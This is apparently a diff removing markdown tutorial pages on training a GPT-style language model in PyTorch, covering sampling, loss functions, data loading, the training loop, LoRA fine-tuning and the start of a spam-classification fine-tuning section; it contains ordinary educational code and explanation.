def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
|
|
||||||
|
|
||||||
# For-loop is the same as before: Get logits, and only focus on last time step
|
|
||||||
for _ in range(max_new_tokens):
|
|
||||||
idx_cond = idx[:, -context_size:]
|
|
||||||
with torch.no_grad():
|
|
||||||
logits = model(idx_cond)
|
|
||||||
logits = logits[:, -1, :]
|
|
||||||
|
|
||||||
# New: Filter logits with top_k sampling
|
|
||||||
if top_k is not None:
|
|
||||||
# Keep only top_k values
|
|
||||||
top_logits, _ = torch.topk(logits, top_k)
|
|
||||||
min_val = top_logits[:, -1]
|
|
||||||
logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)
|
|
||||||
|
|
||||||
# New: Apply temperature scaling
|
|
||||||
if temperature > 0.0:
|
|
||||||
logits = logits / temperature
|
|
||||||
|
|
||||||
# Apply softmax to get probabilities
|
|
||||||
probs = torch.softmax(logits, dim=-1) # (batch_size, context_len)
|
|
||||||
|
|
||||||
# Sample from the distribution
|
|
||||||
idx_next = torch.multinomial(probs, num_samples=1) # (batch_size, 1)
|
|
||||||
|
|
||||||
# Otherwise same as before: get idx of the vocab entry with the highest logits value
|
|
||||||
else:
|
|
||||||
idx_next = torch.argmax(logits, dim=-1, keepdim=True) # (batch_size, 1)
|
|
||||||
|
|
||||||
if idx_next == eos_id: # Stop generating early if end-of-sequence token is encountered and eos_id is specified
|
|
||||||
break
|
|
||||||
|
|
||||||
# Same as before: append sampled index to the running sequence
|
|
||||||
idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1)
|
|
||||||
|
|
||||||
return idx
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of keeping the k most probable samples, **sorts** the whole resulting **vocabulary** by probability and **sums** the probabilities from the highest to the lowest until a **threshold is reached**.
|
|
||||||
>
|
|
||||||
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities.
|
|
||||||
>
|
|
||||||
> This removes the need to select a number of `k` samples, as the optimal k might be different in each case: **only a threshold** is needed (a minimal sketch is shown after this note).
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code._
|
|
||||||
|
|
||||||
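The following is a minimal sketch of how such a top-p filter could look (the `top_p` value and the function name are illustrative assumptions, not part of the original code):

```python
import torch

def top_p_filter(logits, top_p=0.9):
    # Sort the logits, accumulate their probabilities and drop every token
    # whose preceding cumulative mass already exceeds the threshold
    sorted_logits, sorted_idx = torch.sort(logits, descending=True, dim=-1)
    sorted_probs = torch.softmax(sorted_logits, dim=-1)
    cumulative = torch.cumsum(sorted_probs, dim=-1)
    to_remove = cumulative - sorted_probs > top_p  # always keeps the most probable token
    sorted_logits[to_remove] = float("-inf")
    # Undo the sort so the filtered logits line up with the vocabulary again
    filtered = torch.full_like(logits, float("-inf"))
    return filtered.scatter(-1, sorted_idx, sorted_logits)

# It would replace the top-k filtering step inside the generation loop:
# logits = top_p_filter(logits, top_p=0.9)
```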
> [!NOTE]
|
|
||||||
> Another way to improve the generated text is by using **Beam search** instead of the greedy search used in this example.\
|
|
||||||
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code; a minimal sketch follows._
|
|
||||||
|
|
||||||
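A minimal beam-search sketch over the same model could look as follows (the `beam_width` value and the helper name are assumptions; it reuses `model` and the tensor shapes from the previous code):

```python
import torch

def generate_beam_search(model, idx, max_new_tokens, context_size, beam_width=3):
    # Each beam is a (token_ids, cumulative_log_prob) pair
    beams = [(idx, 0.0)]
    for _ in range(max_new_tokens):
        candidates = []
        for seq, score in beams:
            with torch.no_grad():
                logits = model(seq[:, -context_size:])
            log_probs = torch.log_softmax(logits[:, -1, :], dim=-1)
            top_log_probs, top_ids = torch.topk(log_probs, beam_width)
            for lp, tok in zip(top_log_probs[0], top_ids[0]):
                new_seq = torch.cat((seq, tok.view(1, 1)), dim=1)
                candidates.append((new_seq, score + lp.item()))
        # Keep only the beam_width best partial sequences
        beams = sorted(candidates, key=lambda c: c[1], reverse=True)[:beam_width]
    return beams[0][0]  # highest-scoring sequence
```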
### Loss functions
|
|
||||||
|
|
||||||
The **`calc_loss_batch`** function calculates the cross entropy of the prediction of a single batch.\
|
|
||||||
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Define loss functions
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
|
||||||
return loss
|
|
||||||
|
|
||||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
|
||||||
total_loss = 0.
|
|
||||||
if len(data_loader) == 0:
|
|
||||||
return float("nan")
|
|
||||||
elif num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
# Reduce the number of batches to match the total number of batches in the data loader
|
|
||||||
# if num_batches exceeds the number of batches in the data loader
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
total_loss += loss.item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return total_loss / num_batches
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model’s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code._
|
|
||||||
>
|
|
||||||
> Check the following example:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
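As a minimal sketch (assuming the `calc_loss_batch` helper defined in this page and an illustrative `max_norm` of 1.0), gradient clipping would be applied between the backward pass and the optimizer step:

```python
import torch

def train_step_with_clipping(model, optimizer, input_batch, target_batch, device, max_norm=1.0):
    optimizer.zero_grad()
    loss = calc_loss_batch(input_batch, target_batch, model, device)
    loss.backward()
    # Rescale the gradients so their global L2 norm doesn't exceed max_norm
    torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=max_norm)
    optimizer.step()
    return loss.item()
```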
### Loading Data
|
|
||||||
|
|
||||||
The function `create_dataloader_v1` (together with the `GPTDatasetV1` class it relies on) was already discussed in a previous section.
|
|
||||||
|
|
||||||
From here, note how it's defined that 90% of the text is going to be used for training while the remaining 10% will be used for validation, and both sets are stored in 2 different data loaders.\
|
|
||||||
Note that sometimes part of the data set is also left out as a test set to better evaluate the performance of the model.
|
|
||||||
|
|
||||||
Both data loaders use the same batch size, maximum length, stride and number of workers (0 in this case).\
|
|
||||||
The main differences are the data used by each, and the fact that the validation loader doesn't drop the last batch nor shuffle the data, as that isn't needed for validation purposes.
|
|
||||||
|
|
||||||
Also, the fact that the **stride is as big as the context length** means that there won't be any overlap between the contexts used to train the model (this reduces overfitting but also the size of the training data set).
|
|
||||||
|
|
||||||
Moreover, note that the batch size in this case is 2, dividing the data into batches of 2 samples; the main goal of this is to allow parallel processing and reduce the memory consumption per batch.
|
|
||||||
|
|
||||||
```python
|
|
||||||
train_ratio = 0.90
|
|
||||||
split_idx = int(train_ratio * len(text_data))
|
|
||||||
train_data = text_data[:split_idx]
|
|
||||||
val_data = text_data[split_idx:]
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
train_loader = create_dataloader_v1(
|
|
||||||
train_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=True,
|
|
||||||
shuffle=True,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
val_loader = create_dataloader_v1(
|
|
||||||
val_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=False,
|
|
||||||
shuffle=False,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
## Sanity Checks
|
|
||||||
|
|
||||||
The goal is to check that there are enough tokens for training, that the shapes are the expected ones, and to get some info about the number of tokens used for training and for validation:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Sanity checks
|
|
||||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the training loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"increase the `training_ratio`")
|
|
||||||
|
|
||||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the validation loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"decrease the `training_ratio`")
|
|
||||||
|
|
||||||
print("Train loader:")
|
|
||||||
for x, y in train_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
print("\nValidation loader:")
|
|
||||||
for x, y in val_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
train_tokens = 0
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
train_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
val_tokens = 0
|
|
||||||
for input_batch, target_batch in val_loader:
|
|
||||||
val_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
print("Training tokens:", train_tokens)
|
|
||||||
print("Validation tokens:", val_tokens)
|
|
||||||
print("All tokens:", train_tokens + val_tokens)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Select device for training & pre calculations
|
|
||||||
|
|
||||||
The following code just selects the device to use and calculates a training loss and a validation loss (without having trained anything yet) as a starting point.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Indicate the device to use
|
|
||||||
|
|
||||||
if torch.cuda.is_available():
|
|
||||||
device = torch.device("cuda")
|
|
||||||
elif torch.backends.mps.is_available():
|
|
||||||
device = torch.device("mps")
|
|
||||||
else:
|
|
||||||
device = torch.device("cpu")
|
|
||||||
|
|
||||||
print(f"Using {device} device.")
|
|
||||||
|
|
||||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
|
||||||
|
|
||||||
# Pre-calculate losses without starting yet
|
|
||||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
|
||||||
|
|
||||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device)
|
|
||||||
|
|
||||||
print("Training loss:", train_loss)
|
|
||||||
print("Validation loss:", val_loss)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Training functions
|
|
||||||
|
|
||||||
The function `generate_and_print_sample` will just take a context and generate some tokens in order to get a feeling of how good the model is at that point. This is called by `train_model_simple` after each epoch.
|
|
||||||
|
|
||||||
The function `evaluate_model` is called as frequently as indicated to the training function and is used to measure the train loss and the validation loss at that point of the model training.
|
|
||||||
|
|
||||||
Then, the big function `train_model_simple` is the one that actually trains the model. It expects:
|
|
||||||
|
|
||||||
- The train data loader (with the data already separated and prepared for training)
|
|
||||||
- The validation loader
|
|
||||||
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
|
|
||||||
- `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
|
|
||||||
- The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized).
|
|
||||||
- **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing fitting the data well with keeping the model simple, preventing overfitting by discouraging the model from assigning too much importance to any single feature.
|
|
||||||
- Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
|
|
||||||
- The device to use for training
|
|
||||||
- The number of epochs: Number of times to go over the training data
|
|
||||||
- The evaluation frequency: The frequency to call `evaluate_model`
|
|
||||||
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `evaluate_model`
|
|
||||||
- The start context: The starting sentence to use when calling `generate_and_print_sample`
|
|
||||||
- The tokenizer
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Functions to train the model
|
|
||||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
|
||||||
eval_freq, eval_iter, start_context, tokenizer):
|
|
||||||
# Initialize lists to track losses and tokens seen
|
|
||||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
|
||||||
tokens_seen, global_step = 0, -1
|
|
||||||
|
|
||||||
# Main training loop
|
|
||||||
for epoch in range(num_epochs):
|
|
||||||
model.train() # Set model to training mode
|
|
||||||
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
loss.backward() # Calculate loss gradients
|
|
||||||
optimizer.step() # Update model weights using loss gradients
|
|
||||||
tokens_seen += input_batch.numel()
|
|
||||||
global_step += 1
|
|
||||||
|
|
||||||
# Optional evaluation step
|
|
||||||
if global_step % eval_freq == 0:
|
|
||||||
train_loss, val_loss = evaluate_model(
|
|
||||||
model, train_loader, val_loader, device, eval_iter)
|
|
||||||
train_losses.append(train_loss)
|
|
||||||
val_losses.append(val_loss)
|
|
||||||
track_tokens_seen.append(tokens_seen)
|
|
||||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
|
||||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
|
||||||
|
|
||||||
# Print a sample text after each epoch
|
|
||||||
generate_and_print_sample(
|
|
||||||
model, tokenizer, device, start_context
|
|
||||||
)
|
|
||||||
|
|
||||||
return train_losses, val_losses, track_tokens_seen
|
|
||||||
|
|
||||||
|
|
||||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
|
||||||
model.eval() # Set in eval mode to avoid dropout
|
|
||||||
with torch.no_grad():
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
|
||||||
model.train() # Back to training model applying all the configurations
|
|
||||||
return train_loss, val_loss
|
|
||||||
|
|
||||||
|
|
||||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
|
||||||
model.eval() # Set in eval mode to avoid dropout
|
|
||||||
context_size = model.pos_emb.weight.shape[0]
|
|
||||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
|
||||||
with torch.no_grad():
|
|
||||||
token_ids = generate_text(
|
|
||||||
model=model, idx=encoded,
|
|
||||||
max_new_tokens=50, context_size=context_size
|
|
||||||
)
|
|
||||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
|
||||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
|
||||||
model.train() # Back to training model applying all the configurations
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> To improve the learning rate there are a couple of relevant techniques called **linear warmup** and **cosine decay**.
|
|
||||||
>
|
|
||||||
> **Linear warmup** consists of defining an initial learning rate and a maximum one, and gradually increasing the learning rate towards the maximum during the first training steps. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
|
|
||||||
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
|
|
||||||
>
|
|
||||||
> _Note that these improvements aren't included in the previous code; a minimal sketch follows._
|
|
||||||
|
|
||||||
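A minimal sketch of linear warmup followed by cosine decay (the step counts and peak learning rate are illustrative values, and it assumes the `model` defined above):

```python
import math
import torch

peak_lr = 0.0004
warmup_steps = 20
total_steps = 200  # e.g. num_epochs * len(train_loader)

optimizer = torch.optim.AdamW(model.parameters(), lr=peak_lr, weight_decay=0.1)

def lr_lambda(step):
    if step < warmup_steps:
        return (step + 1) / warmup_steps                    # linear warmup up to peak_lr
    progress = (step - warmup_steps) / max(1, total_steps - warmup_steps)
    return 0.5 * (1 + math.cos(math.pi * progress))         # cosine decay down to ~0

scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
# In the training loop, scheduler.step() would be called right after optimizer.step()
```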
### Start training
|
|
||||||
|
|
||||||
```python
|
|
||||||
import time
|
|
||||||
start_time = time.time()
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.to(device)
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
|
||||||
|
|
||||||
num_epochs = 10
|
|
||||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
|
||||||
model, train_loader, val_loader, optimizer, device,
|
|
||||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
|
||||||
start_context="Every effort moves you", tokenizer=tokenizer
|
|
||||||
)
|
|
||||||
|
|
||||||
end_time = time.time()
|
|
||||||
execution_time_minutes = (end_time - start_time) / 60
|
|
||||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
|
||||||
```
|
|
||||||
|
|
||||||
### Print training evolution
|
|
||||||
|
|
||||||
With the following code it's possible to plot the evolution of the model while it was being trained.
|
|
||||||
|
|
||||||
```python
|
|
||||||
import matplotlib.pyplot as plt
|
|
||||||
from matplotlib.ticker import MaxNLocator
|
|
||||||
import math
|
|
||||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
|
||||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
|
||||||
ax1.plot(epochs_seen, train_losses, label="Training loss")
|
|
||||||
ax1.plot(
|
|
||||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
|
||||||
)
|
|
||||||
ax1.set_xlabel("Epochs")
|
|
||||||
ax1.set_ylabel("Loss")
|
|
||||||
ax1.legend(loc="upper right")
|
|
||||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
|
||||||
ax2 = ax1.twiny()
|
|
||||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
|
||||||
ax2.set_xlabel("Tokens seen")
|
|
||||||
fig.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
# Compute perplexity from the loss values
|
|
||||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
|
||||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
|
||||||
# Plot perplexity over tokens seen
|
|
||||||
plt.figure()
|
|
||||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
|
||||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
|
||||||
plt.xlabel('Tokens Seen')
|
|
||||||
plt.ylabel('Perplexity')
|
|
||||||
plt.title('Perplexity over Training')
|
|
||||||
plt.legend()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
|
||||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Save the model
|
|
||||||
|
|
||||||
It's possible to save the model + optimizer if you want to continue training later:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Save the model and the optimizer for later training
|
|
||||||
torch.save({
|
|
||||||
"model_state_dict": model.state_dict(),
|
|
||||||
"optimizer_state_dict": optimizer.state_dict(),
|
|
||||||
},
|
|
||||||
"/tmp/model_and_optimizer.pth"
|
|
||||||
)
|
|
||||||
# Note that this model with the optimizer occupied close to 2GB
|
|
||||||
|
|
||||||
# Restore model and optimizer for training
|
|
||||||
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)
|
|
||||||
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.load_state_dict(checkpoint["model_state_dict"])
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
|
|
||||||
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
|
|
||||||
model.train(); # Put in training mode
|
|
||||||
```
|
|
||||||
|
|
||||||
Or just the model if you are only planning on using it:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Save the model
|
|
||||||
torch.save(model.state_dict(), "model.pth")
|
|
||||||
|
|
||||||
# Load it
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
|
|
||||||
model.load_state_dict(torch.load("model.pth", map_location=device))
|
|
||||||
|
|
||||||
model.eval() # Put in eval mode
|
|
||||||
```
|
|
||||||
|
|
||||||
## Loading GPT2 weights
|
|
||||||
|
|
||||||
There are 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:
|
|
||||||
|
|
||||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
|
|
||||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,61 +0,0 @@
|
|||||||
# 7.0. LoRA Improvements in fine-tuning
|
|
||||||
|
|
||||||
## LoRA Improvements
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Using **LoRA greatly reduces the computation** needed to **fine tune** already trained models.
|
|
||||||
|
|
||||||
LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters you need to train, saving **memory** and **computational resources**. This is because:
|
|
||||||
|
|
||||||
1. **Reduces the Number of Trainable Parameters**: Instead of updating the entire weight matrix in the model, LoRA **splits** the weight update into two smaller matrices (called **A** and **B**). This makes training **faster** and requires **less memory** because fewer parameters need to be updated.
|
|
||||||
|
|
||||||
1. This is because, instead of computing the full weight update of a layer (matrix), it is approximated as a product of 2 smaller matrices, reducing the update that needs to be computed:\
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
2. **Keeps Original Model Weights Unchanged**: LoRA allows you to keep the original model weights the same and only update the **new small matrices** (A and B). This is helpful because it means the model's original knowledge is preserved, and you only tweak what's necessary.
|
|
||||||
3. **Efficient Task-Specific Fine-Tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) while leaving the rest of the model as it is. This is **much more efficient** than retraining the entire model.
|
|
||||||
4. **Storage Efficiency**: After fine-tuning, instead of saving a **whole new model** for each task, you only need to store the **LoRA matrices**, which are very small compared to the entire model. This makes it easier to adapt the model to many tasks without using too much storage.
|
|
||||||
|
|
||||||
In order to implement LoraLayers instead of Linear ones during a fine-tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
|
|
||||||
```python
|
|
||||||
import math
|
|
||||||
|
|
||||||
# Create the LoRA layer with the 2 matrices and the alpha
|
|
||||||
class LoRALayer(torch.nn.Module):
|
|
||||||
def __init__(self, in_dim, out_dim, rank, alpha):
|
|
||||||
super().__init__()
|
|
||||||
self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
|
|
||||||
torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5)) # similar to standard weight initialization
|
|
||||||
self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
|
|
||||||
self.alpha = alpha
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
x = self.alpha * (x @ self.A @ self.B)
|
|
||||||
return x
|
|
||||||
|
|
||||||
# Combine it with the linear layer
|
|
||||||
class LinearWithLoRA(torch.nn.Module):
|
|
||||||
def __init__(self, linear, rank, alpha):
|
|
||||||
super().__init__()
|
|
||||||
self.linear = linear
|
|
||||||
self.lora = LoRALayer(
|
|
||||||
linear.in_features, linear.out_features, rank, alpha
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return self.linear(x) + self.lora(x)
|
|
||||||
|
|
||||||
# Replace linear layers with LoRA ones
|
|
||||||
def replace_linear_with_lora(model, rank, alpha):
|
|
||||||
for name, module in model.named_children():
|
|
||||||
if isinstance(module, torch.nn.Linear):
|
|
||||||
# Replace the Linear layer with LinearWithLoRA
|
|
||||||
setattr(model, name, LinearWithLoRA(module, rank, alpha))
|
|
||||||
else:
|
|
||||||
# Recursively apply the same function to child modules
|
|
||||||
replace_linear_with_lora(module, rank, alpha)
|
|
||||||
```
|
|
||||||
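A minimal usage sketch (the `rank` and `alpha` values are illustrative, and `model` is assumed to be the GPT model loaded previously): freeze the original weights and then swap the `Linear` layers for LoRA-augmented ones.

```python
# Freeze all the original GPT weights
for param in model.parameters():
    param.requires_grad = False

# Inject the LoRA layers; only the A and B matrices will be trainable
replace_linear_with_lora(model, rank=16, alpha=16)

trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"Trainable LoRA parameters: {trainable}")
```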
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,117 +0,0 @@
|
|||||||
# 7.1. Fine-Tuning for Classification
|
|
||||||
|
|
||||||
## What is
|
|
||||||
|
|
||||||
Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> As pre-training an LLM that "understands" text is pretty expensive, it's usually easier and cheaper to fine-tune open-source pre-trained models to perform the specific task we want.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating free text, the LLM gives the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).
|
|
||||||
|
|
||||||
## Preparing the data set
|
|
||||||
|
|
||||||
### Data set size
|
|
||||||
|
|
||||||
Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
|
|
||||||
|
|
||||||
This data set contains many more examples of "not spam" than of "spam", therefore the book suggests to **only use as many examples of "not spam" as of "spam"** (hence removing all the extra examples from the training data). In this case, this was 747 examples of each (a minimal sketch of the balancing and splitting is shown after the list below).
|
|
||||||
|
|
||||||
Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
|
|
||||||
|
|
||||||
- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
|
|
||||||
- This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
|
|
||||||
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
|
|
||||||
|
|
||||||
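A minimal sketch of the balancing and splitting described above (the file name and column names are assumptions about the extracted dataset, not part of the original code):

```python
import pandas as pd

df = pd.read_csv("SMSSpamCollection.tsv", sep="\t", header=None, names=["Label", "Text"])

# Undersample "ham" so both classes have the same number of examples (747 each)
num_spam = df[df["Label"] == "spam"].shape[0]
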